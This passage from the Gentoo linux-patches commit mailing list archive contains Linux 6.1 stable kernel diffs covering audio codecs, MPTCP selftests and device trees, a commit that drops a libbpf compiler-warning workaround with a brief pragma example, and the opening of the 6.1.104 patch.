++	pdev->prop.sink_ports = GENMASK(WSA881X_MAX_SWR_PORTS - 1, 0);
+ 	pdev->prop.sink_dpn_prop = wsa_sink_dpn_prop;
+ 	pdev->prop.scp_int1_mask = SDW_SCP_INT1_BUS_CLASH | SDW_SCP_INT1_PARITY;
+ 	gpiod_direction_output(wsa881x->sd_n, 1);
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index cd96c35a150c8..f4b81ebab3537 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1410,7 +1410,15 @@ static int wsa883x_probe(struct sdw_slave *pdev,
+ 	wsa883x->sconfig.direction = SDW_DATA_DIR_RX;
+ 	wsa883x->sconfig.type = SDW_STREAM_PDM;
+ 
+-	pdev->prop.sink_ports = GENMASK(WSA883X_MAX_SWR_PORTS, 0);
++	/*
++	 * Port map indices start at 0, but the data ports for this codec
++	 * start from index 1.
++	 */
++	if (of_property_read_u32_array(dev->of_node, "qcom,port-mapping", &pdev->m_port_map[1],
++					WSA883X_MAX_SWR_PORTS))
++		dev_dbg(dev, "Static Port mapping not specified\n");
++
++	pdev->prop.sink_ports = GENMASK(WSA883X_MAX_SWR_PORTS - 1, 0);
+ 	pdev->prop.simple_clk_stop_capable = true;
+ 	pdev->prop.sink_dpn_prop = wsa_sink_dpn_prop;
+ 	pdev->prop.scp_int1_mask = SDW_SCP_INT1_BUS_CLASH | SDW_SCP_INT1_PARITY;
+diff --git a/sound/soc/meson/axg-fifo.c b/sound/soc/meson/axg-fifo.c
+index 94b169a5493b5..5218e40aeb1bb 100644
+--- a/sound/soc/meson/axg-fifo.c
++++ b/sound/soc/meson/axg-fifo.c
+@@ -207,25 +207,18 @@ static irqreturn_t axg_fifo_pcm_irq_block(int irq, void *dev_id)
+ 	status = FIELD_GET(STATUS1_INT_STS, status);
+ 	axg_fifo_ack_irq(fifo, status);
+ 
+-	/* Use the thread to call period elapsed on nonatomic links */
+-	if (status & FIFO_INT_COUNT_REPEAT)
+-		return IRQ_WAKE_THREAD;
++	if (status & ~FIFO_INT_COUNT_REPEAT)
++		dev_dbg(axg_fifo_dev(ss), "unexpected irq - STS 0x%02x\n",
++			status);
+ 
+-	dev_dbg(axg_fifo_dev(ss), "unexpected irq - STS 0x%02x\n",
+-		status);
++	if (status & FIFO_INT_COUNT_REPEAT) {
++		snd_pcm_period_elapsed(ss);
++		return IRQ_HANDLED;
++	}
+ 
+ 	return IRQ_NONE;
+ }
+ 
+-static irqreturn_t axg_fifo_pcm_irq_block_thread(int irq, void *dev_id)
+-{
+-	struct snd_pcm_substream *ss = dev_id;
+-
+-	snd_pcm_period_elapsed(ss);
+-
+-	return IRQ_HANDLED;
+-}
+-
+ int axg_fifo_pcm_open(struct snd_soc_component *component,
+ 		      struct snd_pcm_substream *ss)
+ {
+@@ -251,8 +244,9 @@ int axg_fifo_pcm_open(struct snd_soc_component *component,
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = request_threaded_irq(fifo->irq, axg_fifo_pcm_irq_block,
+-				   axg_fifo_pcm_irq_block_thread,
++	/* Use the threaded irq handler only with non-atomic links */
++	ret = request_threaded_irq(fifo->irq, NULL,
++				   axg_fifo_pcm_irq_block,
+ 				   IRQF_ONESHOT, dev_name(dev), ss);
+ 	if (ret)
+ 		return ret;
+diff --git a/sound/soc/sof/mediatek/mt8195/mt8195.c b/sound/soc/sof/mediatek/mt8195/mt8195.c
+index 3c81e84fcecfa..53cadbe8a05cc 100644
+--- a/sound/soc/sof/mediatek/mt8195/mt8195.c
++++ b/sound/soc/sof/mediatek/mt8195/mt8195.c
+@@ -662,7 +662,7 @@ static struct snd_sof_dsp_ops sof_mt8195_ops = {
+ static struct snd_sof_of_mach sof_mt8195_machs[] = {
+ 	{
+ 		.compatible = "google,tomato",
+-		.sof_tplg_filename = "sof-mt8195-mt6359-rt1019-rt5682-dts.tplg"
++		.sof_tplg_filename = "sof-mt8195-mt6359-rt1019-rt5682.tplg"
+ 	}, {
+ 		.compatible = "mediatek,mt8195",
+ 		.sof_tplg_filename = "sof-mt8195.tplg"
+diff --git a/sound/usb/line6/driver.c b/sound/usb/line6/driver.c
+index f4437015d43a7..9df49a880b750 100644
+--- a/sound/usb/line6/driver.c
++++ b/sound/usb/line6/driver.c
+@@ -286,12 +286,14 @@ static void line6_data_received(struct urb *urb)
+ {
+ 	struct usb_line6 *line6 = (struct usb_line6 *)urb->context;
+ 	struct midi_buffer *mb = &line6->line6midi->midibuf_in;
++	unsigned long flags;
+ 	int done;
+ 
+ 	if (urb->status == -ESHUTDOWN)
+ 		return;
+ 
+ 	if (line6->properties->capabilities & LINE6_CAP_CONTROL_MIDI) {
++		spin_lock_irqsave(&line6->line6midi->lock, flags);
+ 		done =
+ 			line6_midibuf_write(mb, urb->transfer_buffer, urb->actual_length);
+ 
+@@ -300,12 +302,15 @@ static void line6_data_received(struct urb *urb)
+ 			dev_dbg(line6->ifcdev, "%d %d buffer overflow - message skipped\n",
+ 				done, urb->actual_length);
+ 		}
++		spin_unlock_irqrestore(&line6->line6midi->lock, flags);
+ 
+ 		for (;;) {
++			spin_lock_irqsave(&line6->line6midi->lock, flags);
+ 			done =
+ 				line6_midibuf_read(mb, line6->buffer_message,
+ 						   LINE6_MIDI_MESSAGE_MAXLEN,
+ 						   LINE6_MIDIBUF_READ_RX);
++			spin_unlock_irqrestore(&line6->line6midi->lock, flags);
+ 
+ 			if (done <= 0)
+ 				break;
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index 5d72dc8441cbb..af1b8cf5a9883 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -2594,6 +2594,10 @@ YAMAHA_DEVICE(0x7010, "UB99"),
+ 	}
+ },
+ 
++/* Stanton ScratchAmp */
++{ USB_DEVICE(0x103d, 0x0100) },
++{ USB_DEVICE(0x103d, 0x0101) },
++
+ /* Novation EMS devices */
+ {
+ 	USB_DEVICE_VENDOR_SPEC(0x1235, 0x0001),
+diff --git a/tools/arch/arm64/include/asm/cputype.h b/tools/arch/arm64/include/asm/cputype.h
+index abc418650fec0..63e90432f8c9f 100644
+--- a/tools/arch/arm64/include/asm/cputype.h
++++ b/tools/arch/arm64/include/asm/cputype.h
+@@ -83,6 +83,9 @@
+ #define ARM_CPU_PART_CORTEX_X2		0xD48
+ #define ARM_CPU_PART_NEOVERSE_N2	0xD49
+ #define ARM_CPU_PART_CORTEX_A78C	0xD4B
++#define ARM_CPU_PART_NEOVERSE_V2	0xD4F
++#define ARM_CPU_PART_CORTEX_X4		0xD82
++#define ARM_CPU_PART_NEOVERSE_V3	0xD84
+ 
+ #define APM_CPU_PART_POTENZA		0x000
+ 
+@@ -145,6 +148,9 @@
+ #define MIDR_CORTEX_X2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X2)
+ #define MIDR_NEOVERSE_N2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_N2)
+ #define MIDR_CORTEX_A78C	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A78C)
++#define MIDR_NEOVERSE_V2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_V2)
++#define MIDR_CORTEX_X4 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X4)
++#define MIDR_NEOVERSE_V3 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_V3)
+ #define MIDR_THUNDERX	MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX)
+ #define MIDR_THUNDERX_81XX MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX_81XX)
+ #define MIDR_THUNDERX_83XX MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX_83XX)
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index 21817eb510396..7e0b846e17eef 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -1707,10 +1707,6 @@ static int load_with_options(int argc, char **argv, bool first_prog_only)
+ 	}
+ 
+ 	if (pinmaps) {
+-		err = create_and_mount_bpffs_dir(pinmaps);
+-		if (err)
+-			goto err_unpin;
+-
+ 		err = bpf_object__pin_maps(obj, pinmaps);
+ 		if (err) {
+ 			p_err("failed to pin all maps");
+diff --git a/tools/testing/selftests/bpf/prog_tests/send_signal.c b/tools/testing/selftests/bpf/prog_tests/send_signal.c
+index d63a20fbed339..210b806351bcf 100644
+--- a/tools/testing/selftests/bpf/prog_tests/send_signal.c
++++ b/tools/testing/selftests/bpf/prog_tests/send_signal.c
+@@ -152,7 +152,8 @@ static void test_send_signal_tracepoint(bool signal_thread)
+ static void test_send_signal_perf(bool signal_thread)
+ {
+ 	struct perf_event_attr attr = {
+-		.sample_period = 1,
++		.freq = 1,
++		.sample_freq = 1000,
+ 		.type = PERF_TYPE_SOFTWARE,
+ 		.config = PERF_COUNT_SW_CPU_CLOCK,
+ 	};
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 51f68bb6bdb8a..a283107646540 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -1800,6 +1800,8 @@ chk_prio_nr()
+ {
+ 	local mp_prio_nr_tx=$1
+ 	local mp_prio_nr_rx=$2
++	local mpj_syn=$3
++	local mpj_syn_ack=$4
+ 	local count
+ 	local dump_stats
+ 
+@@ -1827,6 +1829,30 @@ chk_prio_nr()
+ 		echo "[ ok ]"
+ 	fi
+ 
++	printf "%-${nr_blank}s %s" " " "bkp syn"
++	count=$(get_counter ${ns1} "MPTcpExtMPJoinSynBackupRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$mpj_syn" ]; then
++		echo "[fail] got $count JOIN[s] syn with Backup expected $mpj_syn"
++		fail_test
++		dump_stats=1
++	else
++		echo -n "[ ok ]"
++	fi
++
++	echo -n " - synack   "
++	count=$(get_counter ${ns2} "MPTcpExtMPJoinSynAckBackupRx")
++	if [ -z "$count" ]; then
++		echo "[skip]"
++	elif [ "$count" != "$mpj_syn_ack" ]; then
++		echo "[fail] got $count JOIN[s] synack with Backup expected $mpj_syn_ack"
++		fail_test
++		dump_stats=1
++	else
++		echo "[ ok ]"
++	fi
++
+ 	[ "${dump_stats}" = 1 ] && dump_stats
+ }
+ 
+@@ -2633,11 +2659,23 @@ backup_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow nobackup
+ 		chk_join_nr 1 1 1
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 1 0
+ 	fi
+ 
+ 	# single address, backup
+ 	if reset "single address, backup" &&
++	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 1
++		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal,backup
++		pm_nl_set_limits $ns2 1 1
++		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow nobackup
++		chk_join_nr 1 1 1
++		chk_add_nr 1 1
++		chk_prio_nr 1 0 0 1
++	fi
++
++	# single address, switch to backup
++	if reset "single address, switch to backup" &&
+ 	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+@@ -2645,19 +2683,19 @@ backup_tests()
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+-		chk_prio_nr 1 1
++		chk_prio_nr 1 1 0 0
+ 	fi
+ 
+ 	# single address with port, backup
+ 	if reset "single address with port, backup" &&
+ 	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+-		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal port 10100
++		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal,backup port 10100
+ 		pm_nl_set_limits $ns2 1 1
+-		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
++		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow nobackup
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 1 1
+-		chk_prio_nr 1 1
++		chk_prio_nr 1 0 0 1
+ 	fi
+ 
+ 	if reset "mpc backup" &&
+@@ -2665,16 +2703,25 @@ backup_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 0 0 0
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 0 0
+ 	fi
+ 
+ 	if reset "mpc backup both sides" &&
+ 	   continue_if mptcp_lib_kallsyms_doesnt_have "T mptcp_subflow_send_ack$"; then
+-		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow,backup
++		pm_nl_set_limits $ns1 0 2
++		pm_nl_set_limits $ns2 1 2
++		pm_nl_add_endpoint $ns1 10.0.1.1 flags signal,backup
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
++
++		# 10.0.2.2 (non-backup) -> 10.0.1.1 (backup)
++		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow
++		# 10.0.1.2 (backup) -> 10.0.2.1 (non-backup)
++		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
++		ip -net "$ns2" route add 10.0.2.1 via 10.0.1.1 dev ns2eth1 # force this path
++
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+-		chk_join_nr 0 0 0
+-		chk_prio_nr 1 1
++		chk_join_nr 2 2 2
++		chk_prio_nr 1 1 1 1
+ 	fi
+ 
+ 	if reset "mpc switch to backup" &&
+@@ -2682,7 +2729,7 @@ backup_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 0 0 0
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 0 0
+ 	fi
+ 
+ 	if reset "mpc switch to backup both sides" &&
+@@ -2691,7 +2738,7 @@ backup_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 0 0 0
+-		chk_prio_nr 1 1
++		chk_prio_nr 1 1 0 0
+ 	fi
+ }
+ 
+@@ -3022,7 +3069,7 @@ fullmesh_tests()
+ 		pm_nl_set_limits $ns2 4 4
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 1 slow backup,fullmesh
+ 		chk_join_nr 2 2 2
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 1 0
+ 		chk_rm_nr 0 1
+ 	fi
+ 
+@@ -3034,7 +3081,7 @@ fullmesh_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow,backup,fullmesh
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow nobackup,nofullmesh
+ 		chk_join_nr 2 2 2
+-		chk_prio_nr 0 1
++		chk_prio_nr 0 1 1 0
+ 		chk_rm_nr 0 1
+ 	fi
+ }
+@@ -3140,7 +3187,7 @@ userspace_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 1 1 0
+-		chk_prio_nr 0 0
++		chk_prio_nr 0 0 0 0
+ 	fi
+ 
+ 	# userspace pm type prevents rm_addr
+diff --git a/tools/testing/selftests/rcutorture/bin/torture.sh b/tools/testing/selftests/rcutorture/bin/torture.sh
+index d477618e7261d..483f22f5abd7c 100755
+--- a/tools/testing/selftests/rcutorture/bin/torture.sh
++++ b/tools/testing/selftests/rcutorture/bin/torture.sh
+@@ -405,16 +405,16 @@ fi
+ 
+ if test "$do_clocksourcewd" = "yes"
+ then
+-	torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000"
++	torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000 tsc=watchdog"
+ 	torture_set "clocksourcewd-1" tools/testing/selftests/rcutorture/bin/kvm.sh --allcpus --duration 45s --configs TREE03 --kconfig "CONFIG_TEST_CLOCKSOURCE_WATCHDOG=y" --trust-make
+ 
+-	torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000 clocksource.max_cswd_read_retries=1"
++	torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000 tsc=watchdog"
+ 	torture_set "clocksourcewd-2" tools/testing/selftests/rcutorture/bin/kvm.sh --allcpus --duration 45s --configs TREE03 --kconfig "CONFIG_TEST_CLOCKSOURCE_WATCHDOG=y" --trust-make
+ 
+ 	# In case our work is already done...
+ 	if test "$do_rcutorture" != "yes"
+ 	then
+-		torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000"
++		torture_bootargs="rcupdate.rcu_cpu_stall_suppress_at_boot=1 torture.disable_onoff_at_boot rcupdate.rcu_task_stall_timeout=30000 tsc=watchdog"
+ 		torture_set "clocksourcewd-3" tools/testing/selftests/rcutorture/bin/kvm.sh --allcpus --duration 45s --configs TREE03 --trust-make
+ 	fi
+ fi


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-11 13:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-11 13:32 UTC (permalink / raw
  To: gentoo-commits

commit:     2c7a18d50c40d0cea893591cf6cad68893a1de20
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Aug 11 13:31:29 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Aug 11 13:31:29 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2c7a18d5

Drop libbpf patch. Not relevant for 6.1

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...workaround-Wmaybe-uninitialized-false-pos.patch | 67 ----------------------
 2 files changed, 71 deletions(-)

diff --git a/0000_README b/0000_README
index 86ad8e24..e41d3db8 100644
--- a/0000_README
+++ b/0000_README
@@ -499,10 +499,6 @@ Patch:  2960_jump-label-fix.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/
 Desc:   jump_label: Fix a regression
 
-Patch:  2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
-From:   https://lore.kernel.org/bpf/3ebbe7a4e93a5ddc3a26e2e11d329801d7c8de6b.1723217044.git.sam@gentoo.org/
-Desc:   libbpf: workaround -Wmaybe-uninitialized false positive
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch b/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
deleted file mode 100644
index 86de18d7..00000000
--- a/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From git@z Thu Jan  1 00:00:00 1970
-Subject: [PATCH] libbpf: workaround -Wmaybe-uninitialized false positive
-From: Sam James <sam@gentoo.org>
-Date: Fri, 09 Aug 2024 16:24:04 +0100
-Message-Id: <3ebbe7a4e93a5ddc3a26e2e11d329801d7c8de6b.1723217044.git.sam@gentoo.org>
-MIME-Version: 1.0
-Content-Type: text/plain; charset="utf-8"
-Content-Transfer-Encoding: 8bit
-
-In `elf_close`, we get this with GCC 15 -O3 (at least):
-```
-In function ‘elf_close’,
-    inlined from ‘elf_close’ at elf.c:53:6,
-    inlined from ‘elf_find_func_offset_from_file’ at elf.c:384:2:
-elf.c:57:9: warning: ‘elf_fd.elf’ may be used uninitialized [-Wmaybe-uninitialized]
-   57 |         elf_end(elf_fd->elf);
-      |         ^~~~~~~~~~~~~~~~~~~~
-elf.c: In function ‘elf_find_func_offset_from_file’:
-elf.c:377:23: note: ‘elf_fd.elf’ was declared here
-  377 |         struct elf_fd elf_fd;
-      |                       ^~~~~~
-In function ‘elf_close’,
-    inlined from ‘elf_close’ at elf.c:53:6,
-    inlined from ‘elf_find_func_offset_from_file’ at elf.c:384:2:
-elf.c:58:9: warning: ‘elf_fd.fd’ may be used uninitialized [-Wmaybe-uninitialized]
-   58 |         close(elf_fd->fd);
-      |         ^~~~~~~~~~~~~~~~~
-elf.c: In function ‘elf_find_func_offset_from_file’:
-elf.c:377:23: note: ‘elf_fd.fd’ was declared here
-  377 |         struct elf_fd elf_fd;
-      |                       ^~~~~~
-```
-
-In reality, our use is fine, it's just that GCC doesn't model errno
-here (see linked GCC bug). Suppress -Wmaybe-uninitialized accordingly.
-
-Link: https://gcc.gnu.org/PR114952
-Signed-off-by: Sam James <sam@gentoo.org>
----
- tools/lib/bpf/elf.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/tools/lib/bpf/elf.c b/tools/lib/bpf/elf.c
-index c92e02394159e..ee226bb8e1af0 100644
---- a/tools/lib/bpf/elf.c
-+++ b/tools/lib/bpf/elf.c
-@@ -369,6 +369,9 @@ long elf_find_func_offset(Elf *elf, const char *binary_path, const char *name)
- 	return ret;
- }
- 
-+#pragma GCC diagnostic push
-+/* https://gcc.gnu.org/PR114952 */
-+#pragma GCC diagnostic ignored "-Wmaybe-uninitialized"
- /* Find offset of function name in ELF object specified by path. "name" matches
-  * symbol name or name@@LIB for library functions.
-  */
-@@ -384,6 +387,7 @@ long elf_find_func_offset_from_file(const char *binary_path, const char *name)
- 	elf_close(&elf_fd);
- 	return ret;
- }
-+#pragma GCC diagnostic pop
- 
- struct symbol {
- 	const char *name;
--- 
-2.45.2
-
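
For readers unfamiliar with the workaround being dropped above: the patch bracketed the one affected function with GCC's diagnostic pragmas, the standard way to silence a single spurious warning without disabling it build-wide. A minimal, self-contained sketch of that pattern follows (hypothetical code, not from the kernel tree; only the pragma lines mirror the dropped patch):

```c
#include <stdio.h>

static int maybe_fill(int *out, int flag)
{
	if (!flag)
		return -1;	/* *out is left untouched on failure */
	*out = 42;
	return 0;
}

#pragma GCC diagnostic push
/* Scope the suppression to the single function that trips the warning. */
#pragma GCC diagnostic ignored "-Wmaybe-uninitialized"
static int use_value(int flag)
{
	int v;

	if (maybe_fill(&v, flag) < 0)
		return -1;
	/*
	 * v is provably set on this path, but GCC's flow analysis cannot
	 * always see that the early return above guards the read, so at
	 * higher optimization levels it may warn here.
	 */
	return v;
}
#pragma GCC diagnostic pop

int main(void)
{
	printf("%d\n", use_value(1));
	return 0;
}
```

Compiled with `gcc -O3 -Wmaybe-uninitialized`, the push/ignored/pop pair keeps the warning enabled everywhere except the function where the false positive occurs.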


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-11 13:29 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-11 13:29 UTC (permalink / raw
  To: gentoo-commits

commit:     dca16a6cea3a2943eafe6ce25311f7b5c0a84d9c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Aug 11 13:29:06 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Aug 11 13:29:06 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=dca16a6c

Linux patch 6.1.104

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1103_linux-6.1.104.patch | 3025 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3029 insertions(+)

diff --git a/0000_README b/0000_README
index 97b15896..86ad8e24 100644
--- a/0000_README
+++ b/0000_README
@@ -455,6 +455,10 @@ Patch:  1102_linux-6.1.103.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.103
 
+Patch:  1103_linux-6.1.104.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.104
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1103_linux-6.1.104.patch b/1103_linux-6.1.104.patch
new file mode 100644
index 00000000..3de54dbb
--- /dev/null
+++ b/1103_linux-6.1.104.patch
@@ -0,0 +1,3025 @@
+diff --git a/Makefile b/Makefile
+index 97149e46565ae..0dd963d6d8d26 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 103
++SUBLEVEL = 104
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 3d8e5ba51ce0d..2f53c099634b5 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -593,6 +593,7 @@ dwc_0: usb@8a00000 {
+ 				interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&qusb_phy_0>, <&usb0_ssphy>;
+ 				phy-names = "usb2-phy", "usb3-phy";
++				snps,parkmode-disable-ss-quirk;
+ 				snps,is-utmi-l1-suspend;
+ 				snps,hird-threshold = /bits/ 8 <0x0>;
+ 				snps,dis_u2_susphy_quirk;
+@@ -635,6 +636,7 @@ dwc_1: usb@8c00000 {
+ 				interrupts = <GIC_SPI 99 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&qusb_phy_1>, <&usb1_ssphy>;
+ 				phy-names = "usb2-phy", "usb3-phy";
++				snps,parkmode-disable-ss-quirk;
+ 				snps,is-utmi-l1-suspend;
+ 				snps,hird-threshold = /bits/ 8 <0x0>;
+ 				snps,dis_u2_susphy_quirk;
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index 3d4941dc31d74..4de9ff045ff52 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -2029,7 +2029,8 @@ usb3_dwc3: usb@a800000 {
+ 				interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>;
+ 				snps,dis_u2_susphy_quirk;
+ 				snps,dis_enblslpm_quirk;
+-				phys = <&qusb2phy>, <&usb1_ssphy>;
++				snps,parkmode-disable-ss-quirk;
++				phys = <&qusb2phy>, <&usb3phy>;
+ 				phy-names = "usb2-phy", "usb3-phy";
+ 				snps,has-lpm-erratum;
+ 				snps,hird-threshold = /bits/ 8 <0x10>;
+@@ -2038,33 +2039,26 @@ usb3_dwc3: usb@a800000 {
+ 
+ 		usb3phy: phy@c010000 {
+ 			compatible = "qcom,msm8998-qmp-usb3-phy";
+-			reg = <0x0c010000 0x18c>;
+-			status = "disabled";
+-			#address-cells = <1>;
+-			#size-cells = <1>;
+-			ranges;
++			reg = <0x0c010000 0x1000>;
+ 
+ 			clocks = <&gcc GCC_USB3_PHY_AUX_CLK>,
++				 <&gcc GCC_USB3_CLKREF_CLK>,
+ 				 <&gcc GCC_USB_PHY_CFG_AHB2PHY_CLK>,
+-				 <&gcc GCC_USB3_CLKREF_CLK>;
+-			clock-names = "aux", "cfg_ahb", "ref";
++				 <&gcc GCC_USB3_PHY_PIPE_CLK>;
++			clock-names = "aux",
++				      "ref",
++				      "cfg_ahb",
++				      "pipe";
++			clock-output-names = "usb3_phy_pipe_clk_src";
++			#clock-cells = <0>;
++			#phy-cells = <0>;
+ 
+ 			resets = <&gcc GCC_USB3_PHY_BCR>,
+ 				 <&gcc GCC_USB3PHY_PHY_BCR>;
+-			reset-names = "phy", "common";
++			reset-names = "phy",
++				      "phy_phy";
+ 
+-			usb1_ssphy: phy@c010200 {
+-				reg = <0xc010200 0x128>,
+-				      <0xc010400 0x200>,
+-				      <0xc010c00 0x20c>,
+-				      <0xc010600 0x128>,
+-				      <0xc010800 0x200>;
+-				#phy-cells = <0>;
+-				#clock-cells = <0>;
+-				clocks = <&gcc GCC_USB3_PHY_PIPE_CLK>;
+-				clock-names = "pipe0";
+-				clock-output-names = "usb3_phy_pipe_clk_src";
+-			};
++			status = "disabled";
+ 		};
+ 
+ 		qusb2phy: phy@c012000 {
+diff --git a/arch/arm64/include/asm/jump_label.h b/arch/arm64/include/asm/jump_label.h
+index b5bd3c38a01b2..e714d7770999e 100644
+--- a/arch/arm64/include/asm/jump_label.h
++++ b/arch/arm64/include/asm/jump_label.h
+@@ -13,6 +13,7 @@
+ #include <linux/types.h>
+ #include <asm/insn.h>
+ 
